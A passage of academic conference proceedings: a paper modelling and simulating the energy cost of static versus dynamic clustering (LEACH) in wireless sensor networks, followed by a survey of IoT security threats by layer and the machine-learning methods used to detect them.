16. Erharter, G.H., Marcher, T.: MSAC: towards data driven system behavior classification for TBM tunneling. Tunn. Undergr. Space Technol. 103, 103466 (2020)
17. Smiti, A.: A critical overview of outlier detection methods. Comput. Sci. Rev. 38, 100306 (2020)
18. Chepenko, D.: A density-based algorithm for outlier detection (2018)
19. McGilvray, D.: Executing data quality projects: ten steps to quality data and trusted information. Morgan Kaufmann, Elsevier, Burlington, MA, USA (2008). [ISBN: 978-0-12-374369-5]
20. Grey, M., et al.: Towards distributed geolocation by employing a delay-based optimization scheme. In: 2014 IEEE Symposium on Computers and Communications (ISCC). IEEE (2014)

Performance Analysis of Static and Dynamic Clustering Protocols for Wireless Sensor Network El Idrissi Nezha(B) and Najid Abdellah Department of Communication Systems, National Institute of Post and Telecommunications (INPT), Rabat, Morocco {elidrissi.nezha,najid}@inpt.ac.ma

Abstract. Power consumption is a critical issue in wireless sensor networks, since sensor nodes are typically battery powered and have limited energy reserves. Energy efficiency is considered one of the most important measures in this field. Clustering algorithms are the main techniques used to improve the energy efficiency of wireless sensor networks (WSNs). In a clustering algorithm, the sensor nodes are organized into different groups, called clusters, each managed by a sensor node called the Cluster Head (CH). The CH forwards the data received from its members to the base station (BS) for analysis. In the literature, different clustering algorithms are proposed, either dynamic or static. Algorithms based on Dynamic Clustering (DC) form the clusters in each round, based on some criteria or randomly, during the set-up phase, whereas in algorithms based on Static Clustering (SC) the clusters are formed only in the first round and remain fixed during network operation. Most researchers do not specify the type of clustering used, but it can be deduced from the algorithm. In this paper, we evaluate both DC and SC algorithms to determine which approach best improves the network lifetime and energy efficiency in WSNs. The simulation results show that the algorithms based on static clustering are more efficient than those based on dynamic clustering. Keywords: Wireless sensor networks · Clustering · Cluster head · Selection algorithms · Energy efficient · Hierarchical routing protocol · Residual energy · Network lifetime · LEACH

1 Introduction

Wireless Sensor Networks are widely used in many applications, including industrial, security and surveillance applications. A Wireless Sensor Network (WSN) consists of a huge number of sensor nodes connected to each other for communication. The sensor nodes are deployed randomly in the monitoring area to collect data from the environment and send it to the Base Station (BS) [1]. Energy efficiency in WSNs is an important issue today because the sensor


nodes use energy from non-rechargeable batteries to sense the data and thus have limited energy. Hierarchical protocols based on clustering are considered an efficient routing technique to organize the network and reduce data redundancy compared with non-clustering protocols [2]. In the clustering technique, the sensor nodes organize themselves into clusters, each cluster being managed by a node called the cluster head (CH), as illustrated in Fig. 1.

Fig. 1. Wireless Sensor Network

The CH aggregates all collected data and sends it to the sink [3]. The existence of a cluster head reduces the number of communications on the network, thus reducing power consumption and extending the lifetime of the WSN [4]. Different scenarios have been proposed in the context of energy efficiency in WSNs using the clustering technique, but each scenario considers an environment with a specific placement of the sensor nodes; the same protocol might not work efficiently under other conditions, and some of the protocols proposed by researchers target a specific application [5]. The clustering technique has two major tasks: the first is cluster formation and the second is CH selection. Many protocols begin by selecting the CHs, taking different parameters into consideration, and then form the clusters based on this selection, where each non-cluster-head node chooses the nearest CH [6]; other protocols form the clusters first and then choose the CH of each cluster. Clustering can be static (SC) or dynamic (DC): in networks with SC, the network is divided into clusters that remain fixed during the operation of the network, while in DC the clusters are created in every round of aggregation and transmission, as presented in [7]. The works that have studied the performance of wireless sensor networks to improve the Quality of Service (QoS) of the network have presented techniques and algorithms for forming the clusters or choosing the CH of a cluster by considering different parameters, without specifying whether the technique used is SC or DC [8], even though the way in which the clusters are formed is very important and influences the energy consumption. Thus, in this work we quantify the energy


consumed by the two types of clustering in order to compare them and determine which approach is more energy efficient.

2 Energy Consumption Model

A sensor node uses its energy to perform three main tasks: data acquisition, data processing and transmission (communication). Data acquisition: the energy consumed to perform data acquisition is negligible. Data processing: the energy consumed during data processing is calculated by applying formula (1):

$$E_{DA} = 5\ \text{nJ/bit/signal} \quad (1)$$

Therefore, data processing is far less costly than transmission. Communication: data transmission and reception operations consume much more energy than the other tasks. The radio hardware energy consumption model is presented in Fig. 2.

Fig. 2. Radio Dissipation Model

If the distance between the transmitter and the receiver is less than a threshold value d0, a free-space model (d² power loss) is used; otherwise, a multi-path fading channel model (d⁴ power loss) is adopted. The energy consumed by a node when transmitting or receiving l-bit data over a distance d is calculated by Formulas (2) and (3), respectively:

$$E_{TX}(l, d) = \begin{cases} l \cdot E_{elec} + l \cdot \varepsilon_{fs} \cdot d^2, & d < d_0 \\ l \cdot E_{elec} + l \cdot \varepsilon_{mp} \cdot d^4, & d \geq d_0 \end{cases} \quad (2)$$

$$E_{RX}(l) = l \cdot E_{elec} \quad (3)$$

where E_elec is the energy consumed by the transmitter or receiver circuitry per bit and d0 represents the distance threshold. When d < d0, ε_fs is used to calculate E_TX(l, d); otherwise, ε_mp is used. d0 is calculated by formula (4):

$$d_0 = \sqrt{\frac{\varepsilon_{fs}}{\varepsilon_{mp}}} \quad (4)$$
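A small Python sketch of the radio model of Eqs. (2)-(4), using the parameter values listed later in Table 1, may help fix ideas; the 40 m transmission distance in the example call is an arbitrary illustrative choice.

```python
import numpy as np

E_ELEC = 50e-9            # J/bit (Table 1)
EPS_FS = 10e-12           # J/bit/m^2, free-space amplifier
EPS_MP = 0.0013e-12       # J/bit/m^4, multipath amplifier
D0 = np.sqrt(EPS_FS / EPS_MP)        # Eq. (4), about 87.7 m

def e_tx(l_bits, d):
    """Energy to transmit l bits over distance d, Eq. (2)."""
    amp = EPS_FS * d**2 if d < D0 else EPS_MP * d**4
    return l_bits * (E_ELEC + amp)

def e_rx(l_bits):
    """Energy to receive l bits, Eq. (3)."""
    return l_bits * E_ELEC

print(round(D0, 1), e_tx(4000, 40), e_rx(4000))
```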

3 Energy Consumed in Dynamic Clustering (Set-Up Phase)

During cluster formation, each node broadcasts a message m_inf over a distance d containing information such as its id, position, energy level, or a randomly generated number used for CH selection. Every node in the network receives multiple m_inf messages from its neighbors (M messages). The energy consumed in this phase can therefore be calculated by formulas (5) and (6):

$$e_{tx}(m_{inf}, d) = m_{inf} \cdot E_{elec} + \varepsilon_{fs} \cdot d^2 \quad (5)$$

$$e_{rx}(m_{inf}) = M \cdot (m_{inf} \cdot E_{elec}) \quad (6)$$

Next, each elected CH broadcasts a CH message m_ch. The energy consumed by the CH to broadcast m_ch is given by:

$$e_{tx}(m_{ch}, d) = m_{ch} \cdot E_{elec} + \varepsilon_{fs} \cdot d^2 \quad (7)$$

A non-CH node receives multiple m_ch messages and selects the closest CH:

$$e_{rx}(m_{ch}) = K \cdot (m_{ch} \cdot E_{elec}) \quad (8)$$

where K, the number of elected CHs, is equal to the number of clusters that will be formed. Each non-CH node then transmits a membership request message m_req to its CH:

$$e_{tx}(m_{req}, d(n_{ch})) = m_{req} \cdot E_{elec} + \varepsilon_{fs} \cdot d(n_{ch})^2 \quad (9)$$

where d(n_ch) is the distance between the node and its CH.

$$e_{rx}(m_{req}) = m_{req} \cdot E_{elec} \quad (10)$$

The CH receives the request messages from its members and forms the cluster; each CH then transmits its TDMA schedule to its cluster members:

$$e_{tx}(m_{tdm}, d(n_{ch})) = m_{tdm} \cdot E_{elec} + \varepsilon_{fs} \cdot d(n_{ch})^2 \quad (11)$$

$$e_{rx}(m_{tdm}) = m_{tdm} \cdot E_{elec} \quad (12)$$

The total energy consumed in round r_i to form the clusters is therefore given by:

$$E_{set\text{-}up}^{r_i} = N \cdot \big(e_{tx}(m_{inf}, d) + e_{rx}(m_{inf})\big) + K \cdot \big(e_{tx}(m_{ch}, d) + e_{tx}(m_{tdm}, d(n_{ch}))\big) + (N - K) \cdot \big(K \cdot e_{rx}(m_{ch}) + e_{tx}(m_{req}, d(n_{ch})) + e_{rx}(m_{tdm})\big) \quad (13)$$

where N is the total number of nodes and K the number of clusters. Assuming that the energy consumed to transmit or receive each of the exchanged messages is the same, the equation becomes:

$$E_{set\text{-}up}^{r_i} = 2\,e_{tx}\Big(\tfrac{1}{2}N + K + \tfrac{1}{2}(N - K)\Big) + 2\,e_{rx}\Big(\tfrac{1}{2}K + N + (N - K)K\Big) \quad (14)$$


In DC, $E_{set\text{-}up}^{r_i}$ is consumed at the beginning of each round. This means that the overhead of dynamic clustering is given by:

$$E_{set\text{-}up}^{Total} = \sum_{i=0}^{r_{max}} E_{set\text{-}up}^{r_i} \quad (15)$$
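The sketch below evaluates Eqs. (13)-(15) numerically for one plausible configuration (N = 100 nodes, K = 5 clusters, 16-bit control messages as in Table 1); the broadcast distance of 40 m, the number of neighbour messages M = 10 and the 1400 rounds are illustrative assumptions, but they show why paying the set-up cost every round, as DC does, quickly dominates the single set-up of SC.

```python
E_ELEC, EPS_FS = 50e-9, 10e-12     # radio parameters from Table 1
M_INF, D = 16, 40.0                # 16-bit control message, assumed 40 m broadcast range

e_tx_msg = M_INF * E_ELEC + EPS_FS * D**2   # Eq. (5)-style short-message transmit cost
e_rx_msg = M_INF * E_ELEC

def setup_energy_per_round(N, K, M):
    """Eq. (13): control-message energy spent to (re)build the clusters in one round."""
    info    = N * (e_tx_msg + M * e_rx_msg)                      # m_inf exchange, Eqs. (5)-(6)
    heads   = K * (2 * e_tx_msg)                                 # m_ch and TDMA broadcasts
    members = (N - K) * (K * e_rx_msg + e_tx_msg + e_rx_msg)     # join request + TDMA reception
    return info + heads + members

per_round = setup_energy_per_round(N=100, K=5, M=10)
print(per_round, 1400 * per_round)   # Eq. (15): DC pays this every round, SC only once
```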

Although the messages are very small, the amount of communication in each round is significant. Moreover, the nodes must constantly listen for messages from their neighbors in order to form the clusters, whereas their main role is to report data sensed from the environment; they should therefore conserve as much energy as possible for this main role.

4 Energy Consumed in Static Clustering

Static clustering is a method that forms the clusters only once, at the beginning of network operation. The clusters can be formed by the base station (centralized clustering), or through the exchange of messages containing the coordinates of the nodes (self-organizing), so that each node identifies its cluster. There are several ways to form clusters; in this article we present a simple method called geographical clusters (Gj-cluster), which is used in our previously published work (EAC-ECHS) [9]. In the Gj-cluster method, the area of interest is already divided geographically into clusters, meaning that the coordinates Gj(xi, yi) of each cluster are predefined, so each node only has to check its position to identify its cluster using the following rule:

$$n_i \in C_i \Rightarrow \begin{cases} X_{C_j} < X_{C_i} < X_{C_{j+1}} \\ Y_{C_j} < Y_{C_i} < Y_{C_{j+1}} \end{cases} \quad (16)$$

The clusters remain fixed during the operation of the network. The energy consumed by the Gj-cluster method to form the clusters is null, because the clusters are formed without any communication between the nodes. However, the nodes must determine their neighbors to choose the CH. To choose the CH of each formed cluster, each node calculates V_cch (the CH candidate value) with the following equation:

$$V_{cch} = \frac{E_r(n_i)}{d_{BS}(n_i)} \quad (17)$$

where E_r(n_i) is the residual energy of node n_i and d_BS(n_i) is the distance between node n_i and the base station. Each node broadcasts its V_cch together with the id of its cluster and receives the V_cch of its neighbors. The node with the largest value becomes the CH for round 0; since all nodes have the same energy at the beginning (homogeneous network), the CH will be the node closest to the base station. The energy consumed in this phase for choosing the CH in r0 is given by the following equations:

$$e_{tx}(m_{cch}, d) = m_{cch} \cdot E_{elec} + \varepsilon_{fs} \cdot d^2 \quad (18)$$

$$e_{rx}(m_{cch}) = M \cdot (m_{cch} \cdot E_{elec}) \quad (19)$$


where m_cch is a message containing the value of V_cch and the id of the cluster (Cj). To eliminate unnecessary communication between the nodes, the value used to choose the CH is sent with the data in the same packet, and the current CH chooses the CH for the next round based on the V_cch values of its members received with the data. In this way, the nodes do not need extra communication to choose the CH.
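The following sketch illustrates the Gj-cluster assignment of Eq. (16) and the V_cch-based CH selection of Eq. (17) on randomly placed nodes; the 2 x 2 geographic grid and the random seed are assumptions made only for the example, since the granularity of the predefined clusters depends on the deployment.

```python
import numpy as np

rng = np.random.default_rng(1)
N, SIDE, BS = 100, 100.0, np.array([50.0, 50.0])
pos = rng.uniform(0, SIDE, size=(N, 2))
energy = np.full(N, 0.5)                  # homogeneous initial energy (Table 1)

# G_j-clusters: the field is pre-divided into an assumed 2 x 2 grid of geographic clusters
grid = 2
cell = (pos // (SIDE / grid)).astype(int)
cluster_id = cell[:, 0] * grid + cell[:, 1]

# Eq. (17): V_cch = E_r(n_i) / d_BS(n_i); the largest value in each cluster becomes the CH
d_bs = np.linalg.norm(pos - BS, axis=1)
v_cch = energy / d_bs
heads = {int(c): int(np.flatnonzero(cluster_id == c)[np.argmax(v_cch[cluster_id == c])])
         for c in np.unique(cluster_id)}
print(heads)   # with equal energies this is simply the node closest to the BS in each cluster
```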

5 Experiments and Results

In this section we present the simulation results in which we evaluate the performance of SC and DC. We use the MATLAB simulator to implement the approaches and compare the DC and SC protocols. Since LEACH is the first clustering-based algorithm, we compare LEACH-dynamic and LEACH-static to check the efficiency of each, based on the energy consumed during network operation and the number of packets transmitted to the base station. The performance is measured by the following metrics: 1) live nodes during rounds; 2) energy consumption; 3) packets sent to the base station. For the simulations, a network model with the following properties is used: the nodes are assumed to be stationary; all nodes have the same initial energy level; the sensor nodes are distributed randomly; and the BS is located in the middle of the area of interest. The parameters used in the simulation experiments are described in Table 1.

Table 1. Simulation parameters
Parameter | Value
Initial energy | 0.5 J
Data size | 4000 bits
Size of the information message | 16 bits
Network field | 100 m × 100 m
Number of nodes | 100
Base station location | (50, 50)
Eelec | 50 nJ/bit
εfs | 10 pJ/bit/m²
εmp | 0.0013 pJ/bit/m⁴

5.1 Comparison of Network Lifetime

One of the important issues in the design of routing protocols for wireless sensor networks is the maximization of the network lifetime. In this work, the evaluation of the network lifetime is based on the number of live nodes. Figure 3 shows the number of live nodes as a function of rounds for the LEACH-DC and LEACH-SC clustering algorithms. We can see that LEACH-SC extends the life of the network by delaying the death of nodes: as shown in Fig. 3, the last node of LEACH-SC dies around round 1400, whereas for LEACH-DC it dies around round 1300.

5.2 Comparison of the Energy Consumption

Figure 4 presents the total energy consumed over time for the static and dynamic clustering approaches. We can see that the energy consumed in static clustering is lower than in dynamic clustering, because in DC the communication between the nodes needed to form the clusters also consumes energy.

Fig. 3. The network lifetime for Dynamic and Static Clustering approaches.

Fig. 4. Energy consumed over time.

5.3 Comparison of the Data Received by the Base Station

Figure 5 shows the number of packets received by the base station over time. We notice that LEACH-SC achieves better results than LEACH-DC.

Fig. 5. The number of packets received by the base station over time.

6 Conclusion

In this paper we evaluated the performance of dynamic clustering and static clustering for WSNs, using the LEACH protocol to validate the simulation results. According to the simulation results, we can conclude that LEACH with static clustering is more efficient than LEACH with dynamic clustering in terms of network lifetime, energy consumption and packets received by the BS. To build on these results, we plan in future work to combine static clustering with machine learning algorithms and to compare our algorithm with other recent algorithms in the field.

References 1. Wang, J., Gao, Y., Wang, K., Sangaiah, A.K., Lim, S.-J.: An affinity propagationbased self-adaptive clustering method for wireless sensor networks. Sensors 19(11), 2579 (2019) 2. Wang, J., Gao, Y., Liu, W., Sangaiah, A.K., Kim, H.-J.: Energy efficient routing algorithm with mobile sink support for wireless sensor networks. Sensors 19(7), 1494 (2019)


3. El Aalaoui, A., Hajraoui, A.: Energy efficiency of organized cluster election method in wireless sensor networks. Indonesian J. Electr. Eng. Comput. Sci. 18(1), 218–226 (2020)
4. Jafarizadeh, V., Keshavarzi, A., Derikvand, T.: Efficient cluster head selection using Naïve Bayes classifier for wireless sensor networks. Wireless Netw. 23(3), 779–785 (2017)
5. Singh, J., Yadav, S.S., Vinay Kanungo, Y., Pal, V.: A node overhaul scheme for energy efficient clustering in wireless sensor networks. IEEE Sens. Lett. 5(4), 1–4 (2021)
6. Santhosh Kumar, S.V.N., Palanichamy, Y., Selvi, M., Ganapathy, S., Kannan, A., Perumal, S.P.: Energy efficient secured means based unequal fuzzy clustering algorithm for efficient reprogramming in wireless sensor networks. Wireless Netw. 27(6), 3873–3894 (2021)
7. El Idrissi, N., Najid, A., El Alami, H.: New routing technique to enhance energy efficiency and maximize lifetime of the network in WSNs. Int. J. Wireless Netw. Broadband Technol. 9(2), 81–93 (2020)
8. Thangaramya, K., et al.: Energy aware cluster and neuro-fuzzy based routing algorithm for wireless sensor networks in IoT. Comput. Netw. 151, 211–223 (2019)
9. El Idrissi, N., Abdellah, N., El Alami, H.: Energy-aware clustering and efficient cluster head selection. Int. J. Smart Sens. Intell. Syst. 14(1), 1–15 (2021)

A Comprehensive Study of Integrating AI-Based Security Techniques on the Internet of Things Adnan El Ahmadi1(B) , Otman Abdoun2 , and El Khatir Haimoudi1 1 Polydisciplinary Faculty, Abdelmalek Essaadi University, Larache, Morocco

[email protected] 2 Computer Science Department, Faculty of Sciences, Abdelmalek Essaadi University, Tétouan,

Morocco

Abstract. The explosive rate of the evolution of IoT leads to a demand for nodes and data security. IoT nodes are vulnerable to a variety of critical attacks and security threats because of the heterogeneity of standards and data handled by these nodes. However, nodes and data security are critical challenges for researchers. Thus, we need to explore a solution that responds to various critical challenges in the IoT networks and improves its Quality of Service (QoS). Traditional IoT security technologies are insufficient to meet the security challenges that have recently flourished with diverse types of attacks and threats. Consequently, Integrating AI-based security methods and techniques becomes a necessity because it ensures a better detection and efficient countermeasures toward IoT attacks and threats. In this study, we survey the arisen security challenges in IoT Networks. Moreover, this study conducts a multi-layered investigation of IoT security threats and how AI-based security models intelligently protect IoT devices from various attacks and security threats. Finally, we discuss open challenges and upcoming research directions for secure IoT networks. Keywords: Internet of things (IoT) · Artificial Intelligence (AI) · Quality of Service (QoS) · Cybersecurity

1 Introduction
Because of advances in technology, the number of smart and connected devices has risen at an exponential rate. The adoption of the Internet of Things by individuals and organizations is feasible due to the low price of sensors, and an estimated 75 billion connected devices will be reached by the year 2025 [1]. Therefore, safely processing and managing the data generated by interconnected devices is a big challenge when deploying an IoT system. In terms of automation and performance, current and future IoT applications and services have enormous potential to improve the quality of life. At the same time, multiple types of cyber-attacks and threats pose challenging problems for the expansion of IoT [2]. Securing applications and devices is the most basic necessity in an IoT network. With the growth of IoT, various security issues appear as potential threats. Without


a trustworthy system, emerging IoT applications will fail to fulfil the needs of people and society. Typically, IoT systems operate at multiple layers; each layer has a unique set of tasks and associated technologies that need to be performed in an IoT application, and each layer introduces a new set of issues and security risks. For instance, denial of service (DoS) attacks, spoofing attacks, jamming, eavesdropping, data tampering, man-in-the-middle attacks, etc. are the most frequent IoT attacks [3]. Some potential IoT security solutions could be useful depending on each security threat, such as authentication, Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), access control, malware analysis, etc. [4]. Traditional response techniques have deficient performance accuracy due to the high prevalence of security threats and attacks. Artificial intelligence (AI) algorithms can train machines to predict threats or risks at an early stage, or to detect anomalies in Internet of Things (IoT) networks. They provide a robust solution that is regularly updated and can easily detect anomalies and undesirable activities [5]. The main contributions of the current study are as follows:
– This study focuses on understanding AI-based IoT security solutions and their efficiency against malicious activities in the IoT.
– We discuss various challenging IoT security issues at different layers to highlight the aim of this study.
– We present useful architectures and techniques in intelligent security modeling to address security issues in IoT environments.
– Finally, we examine the problems encountered and potential research opportunities and future directions to secure IoT networks and systems.
The remainder of this work is structured as follows. Section 2 presents a brief view of the works related to this comprehensive study. Section 3 presents the definition of the IoT network, its architecture, its challenges, and the security threats. Section 4 introduces AI-based methods for IoT security. Section 5 is devoted to discussing the open challenges and future works.

2 Related Works In recent years, researchers have conducted several studies on IoT security to provide a clear view of future work. By taking advantage of the heterogeneity of IoT networks, attackers may generate dynamic threats attempting to seize control of communications or physical devices. In this section, we review a selection of IoT security surveys. Ali et al. [6] presented research on IoT security issues and classified potential cyberattacks on each IoT architecture layer. They explored challenges to traditional security solutions such as cryptographic solutions (symmetric/asymmetric encryption algorithms), authentication procedures, and key management in the IoT.


The authors in [7] provided a classification of recent research that investigates various Machine Learning (ML) and Deep Learning (DL) strategies for IoT security. They included a taxonomy based on IoT vulnerabilities, the corresponding attackers and impacts, threats that exploit weak links, effective solutions, and organizational authentication technologies that can identify and track such weaknesses. In [8], the authors investigated the security plan for Internet of Things systems and discussed IoT security solutions based on ML techniques such as supervised learning, unsupervised learning, and Reinforcement Learning (RL). That paper focuses on ML-based IoT authentication, access control, secure offloading, and malware detection approaches to preserve data privacy. The study [9] analyzed a variety of threats that have a higher chance of assaulting the IoT, as well as machine learning techniques aiming to counter them, while the authors of [10] studied in detail the numerous layer-based vulnerabilities that exist in the Internet of Things, specifically the primary security requirements of Confidentiality, Integrity, and Availability (CIA). The authors also systematically investigated three advanced technologies, ML, AI, and Blockchain, for resolving IoT security issues. The authors in [11] explored several IoT data sources and classified them into four groups. They also evaluated the existing ML-based solutions that aim to preserve privacy in the IoT. The authors of [12] analyzed the specificity and complexity of IoT security protection before concluding that AI approaches can bring new potent capabilities to meet the IoT's security requirements. They evaluated the technical viability of AI in resolving IoT security issues and outlined a basic process for AI-based IoT security solutions. Taking the example of four serious IoT security problems, namely device authentication, DoS and DDoS attacks, intrusion detection, and malware detection, the authors highlighted AI-based solutions and examined their efficiency against these threats. In [13], the authors examined six ML approaches for their ability to detect MQTT-based attacks. They assessed features at three abstraction levels: packet-based, unidirectional flow, and bidirectional flow. They developed a simulated MQTT data set for training and evaluation purposes. Table 1 summarizes the discussed issues and the countermeasures of IoT systems in existing works.


Table 1. Discussed issues and countermeasures of IoT systems.

Reference | Year | Discussed Issues | Security Algorithms and Techniques
Ali et al. [6] | 2019 | Layer-wise security attacks | Symmetric/asymmetric encryption algorithms
Ahanger et al. [7] | 2022 | Protocol-wise and layer-wise security attacks | ML and DL algorithms
Xiao et al. [8] | 2018 | Addressed various threats | ML algorithms
Gupta et al. [9] | 2020 | Categorized IoT attacks based on goal, performer, and layer | ML-based solutions for DoS, MITM and selective forwarding attacks
Mohanta et al. [10] | 2020 | Several types of IoT attacks | ML, AI and Blockchain technologies
Amiri-Zarandi et al. [11] | 2020 | Layer-wise data sources of IoT networks | ML algorithms to preserve privacy
Hindy et al. [13] | 2020 | Addressed IDS security | ML algorithms
Wu et al. [12] | 2020 | Analyzed a variety of security threats | ML algorithms

Table 2. Brief description of perception layer security threats.

Threat/Attacks | Description
Jamming | Creates noise signals in the same communication channel
Spoofing | Sends unauthorized packets into the network
Sleep denial | Drains the power or alters the sleep routine of IoT devices
Fake node | An unauthorized node is placed on the network
Data tampering | Destroys or alters sensitive information

3 Overview of the Internet of Things (IoT) and Security Threats 3.1 IoT Overview The Internet of Things (IoT) refers to a network of physical objects equipped with interoperable communication technologies that enable them to deliver services. There are many domains in which the IoT can play a remarkable role in our daily lives [14, 15]. Figure 1 gives a representative list of some of the domains that make up the Internet of Things (Tables 2, 3 and 4).


Table 3. Brief description of network layer security threats.

Threat/Attacks | Description
DoS and DDoS | Sends overwhelming messages to the network
Eavesdropping | Accesses private communication to steal information
Wormhole / Sinkhole / Rank | Modifies packet routes, flow speed, or the rank of the nodes
Sybil | A single malicious node uses multiple identities
Hello flood | Sends hello requests to make a node unavailable
Routing Attack | Manipulates the status of RPL-based networks
Man in the Middle Attack | Eavesdrops on and changes the communication

Table 4. Brief description of application layer security threats.

Threat/Attacks | Description
Browser based | Hampers or steals significant data
Phishing | Sends fake links, emails, or messages to deceive users
MQTT based | Targets the MQTT protocol to reduce data transfer performance
Malicious code injection | Injects unauthorized code or data segments

Fig. 1. Emerging fields of the IoT

The Internet of Things connects many heterogeneous objects, so a layered architecture is necessary [16]. According to [17], there is no standard architecture serving as a reference model, although plenty of models have been proposed. Among the proposed


models, the basic one is composed of three layers: the application, network, and perception layers. Recently, many other models have been proposed in the literature, adding more abstraction to the IoT architecture, as illustrated in Fig. 2.

Fig. 2. The IoT architecture: (a) three-layer; (b) middleware-based; (c) SOA-based; (d) five-layer.

The three-layer architecture is the standard and most widely recognized structure; it was employed in the early days of IoT networks. Its three layers are the perception, network, and application layers.
– Perception layer. This is the physical layer that contains ambient information sensors. It detects environmental or physical factors, or identifies other intelligent objects [18].
– Network layer. It connects intelligent gadgets, network devices, and servers to one another. Its capabilities are also used to transmit and process sensor data [18].
– Application layer. It delivers specific application services to the user. It covers various Internet of Things applications, such as smart homes, smart cities, and intelligent health [18].
3.2 Challenges of the Emerging IoT Networks Emerging IoT networks introduce multiple challenges that current models cannot deal with appropriately. Among these challenges:
– Stringent latency requirements. Many control systems require short end-to-end latencies between the sensor and the control node. Other IoT applications, such as emergency services, demand latencies in the millisecond range or below.
– Network bandwidth constraints. The high number of connected things produces an important volume of data. For example, a connected vehicle can create tens of


megabytes per second, covering the vehicle conditions, the surrounding environment, the traffic density, and videos recorded by the vehicle. Sending all the data generated by connected objects requires high network bandwidth.
– Resource-constrained devices. Many IoT devices have limited resources, namely computing power, energy, bandwidth, and storage. Because of these limitations, many devices are unable to meet all the demands placed on them.
– New security challenges. New and adequate security behavior must be applied to physical devices and network routing schemes to address the many challenges of emerging IoT networks. For instance, the increasing number of connected devices makes it a growing challenge to keep the security credentials up to date on each device. Moreover, many resource-constrained devices in the IoT do not have sufficient resources to protect themselves. The classical security paradigm may not be suitable for these new challenges.
3.3 Security Threats in IoT Networks Based on the challenges mentioned above, we present security concerns at different layers of the IoT architecture and systems, notably the perception, network, middleware, and application layers:
– Perception layer security issues (Table 2)
– Network layer security issues (Table 3)
– Application layer security issues (Table 4)
Figure 3 illustrates a summary of the layer-wise security threats in the IoT architecture, which must be intelligently addressed to safeguard IoT applications and services.

Fig. 3. Various security threats at different layers in IoT architecture.


Table 5 categorizes the attacks mentioned above according to the IoT layer they target and the severity of the damage they cause to the network.

Table 5. Categorization of security threats/attacks regarding their impact.

Threat/Attacks | Perception layer | Network layer | Application layer | Impact
Jamming | Yes | – | – | Medium
Spoofing | Yes | – | – | High
Sleep denial | Yes | – | – | High
Fake node | Yes | – | – | High
Data tampering | Yes | – | – | Medium
DoS and DDoS | – | Yes | – | High
Eavesdropping | – | Yes | – | Low
Wormhole / Sinkhole / Rank | – | Yes | – | Medium
Sybil | – | Yes | – | High
Hello flood | – | Yes | –
Routing Attack | – | Yes | – | High
Man in the Middle Attack | – | Yes | – | Medium
Browser based | – | – | Yes | Medium
Phishing | – | – | Yes | Medium
MQTT based | – | – | Yes | High
Malicious code injection | Yes | – | Yes | High

4 AI-Based Methods for IoT Security
4.1 Machine Learning Methods
• Supervised Approaches
• Support Vector Machine (SVM). Builds a separating hyperplane between the different classes of data to classify the given samples.
• Naive Bayes (NB). Computes the posterior probability of an event from the given information to classify the abnormality of a network.
• K-Nearest Neighbors (K-NN). Classifies data or device characteristics as malicious or not based on the votes of the nearest neighbors.
• Decision Tree (DT). A predictive model which uses a tree of decisions over observations to reach a conclusion.
• Random Forest. A tree-based supervised ensemble learning model which constructs a multitude of decision trees to predict the output.


• Ensemble Learning (EL). Combines multiple base ML models to provide better prediction performance.
• Unsupervised Approaches
• K-Means. The data set is partitioned into clusters. Initially, k arbitrary centroids are selected at random; the nodes are then grouped into clusters around the nearest centroids, and the centroids are recalculated as the average of each cluster's nodes. This procedure is repeated until all nodes have been grouped into stable clusters.
• Principal Component Analysis (PCA). Computes the principal components and uses them to perform a change of basis on the data, often keeping only the first few principal components and ignoring the rest.
• Deep Learning Methods
• Supervised Approaches
• Convolutional Neural Network (CNN). Reduces the connections between layers and combines convolutional layers with pooling layers to lower the training complexity.
• Recurrent Neural Network (RNN). Works on sequence-structured data to detect malicious data in time-series-based threats.
• Unsupervised Approaches
• Restricted Boltzmann Machine (RBM). A generative stochastic artificial neural network that can learn a probability distribution over its set of inputs.
• Autoencoder (AE). A type of artificial neural network used to learn efficient codings of unlabeled data.
• Deep Belief Network (DBN). A generative graphical model, or alternatively a class of deep neural network, composed of multiple layers of latent variables, with connections between the layers but not between units within each layer.
• Semi-supervised Approaches
• Generative Adversarial Networks (GANs). A model architecture for training a generative model, most commonly built with deep learning models.
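As a concrete illustration of the supervised branch of this taxonomy, the hedged sketch below trains one of the listed models (a Random Forest) on pre-extracted IoT traffic features with scikit-learn. The file name iot_flows.csv and its label column are hypothetical placeholders, not an actual dataset from this study.

```python
# Illustrative sketch: a supervised ML detector for IoT network traffic,
# assuming a hypothetical CSV of pre-extracted flow features with a "label" column.
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report

df = pd.read_csv("iot_flows.csv")                     # hypothetical dataset path
X, y = df.drop(columns=["label"]), df["label"]
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.2, stratify=y, random_state=0)

clf = RandomForestClassifier(n_estimators=200, random_state=0)  # ensemble of decision trees
clf.fit(X_train, y_train)
print(classification_report(y_test, clf.predict(X_test)))
```

Any of the other supervised models above (SVM, Naive Bayes, K-NN, a single decision tree) could be swapped in through the same scikit-learn interface.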

5 Open Challenges and Future Research Opportunities In this section, we discuss the challenges in identifying threats to IoT security and in researching AI-based countermeasures. In addition, we outline several directions for addressing these obstacles in future research, organized around cybersecurity, latency, real-time detection, data scarcity, and energy efficiency and secure networking (Fig. 4).
– Cybersecurity threats. An exploited IoT node could have catastrophic repercussions on critical applications such as the smart grid and healthcare. Providing node security is one of the greatest research obstacles. If an ML model is employed to secure IoT nodes, the model may only be able to utilize a fraction of the node-generated data.
– Latency. Real-time IoT applications (such as autonomous vehicles, healthcare, online banking, and supply chains) leverage large amounts of training data to develop a deterministic ML model. Real-time IoT systems are often stochastic; hence, existing models are not always suitable for real-time applications.


Fig. 4. AI-techniques for IoT Security

– Real-time detection. Big data analytics can study an organization's event logs to identify dangers and prevent attacks. There is potential for establishing a large-scale data analysis framework to identify context-aware attacks in real time. An AI-based threat model is intended to assess vast amounts of incoming data in real time, detect a threat, and initiate a quick response.
– Data scarcity. AI-based techniques are data-driven, necessitating a vast quantity of real-world data sets. This large volume of data is separated into training and testing datasets. However, generating such a huge volume of clean and noiseless data samples is still a challenge.
– Energy efficiency and secure networking. The IoT requires a balance between security and energy consumption. Security can be costly, both directly in terms of software and hardware expenditures and indirectly in terms of energy usage. Minimal energy consumption and minimal maintenance costs are required for the numerous industrial IoT applications that deploy a high number of connected sensors in inaccessible locations.

